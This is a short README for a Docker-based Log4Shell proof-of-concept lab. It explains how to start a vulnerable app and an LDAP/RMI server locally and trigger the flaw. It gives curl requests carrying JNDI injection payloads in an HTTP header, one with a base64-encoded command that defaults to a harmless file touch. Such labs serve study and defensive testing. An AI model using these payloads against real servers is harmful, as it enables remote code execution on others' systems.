35 lines (24 loc) · 759 Bytes

log4shell POC

Steps

Build the images

docker-compose build

config the command in .env, default is touch /tmp/pwned
Compose!

docker-compose up -d

The vuluerable app is up and the 8080 port is binded on the host machine. To get the ldap payload, please see the log of the container rmi-server.

and make a request, e.g.

curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://rmi-server:1389/7mqfuh}'

Or use jndi-exploit to send the payload, e.g.

curl 127.0.0.1:8080 -H 'X-Api-Version: ${jndi:ldap://jndi-exploit:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'

Check the result, go to the console of the app.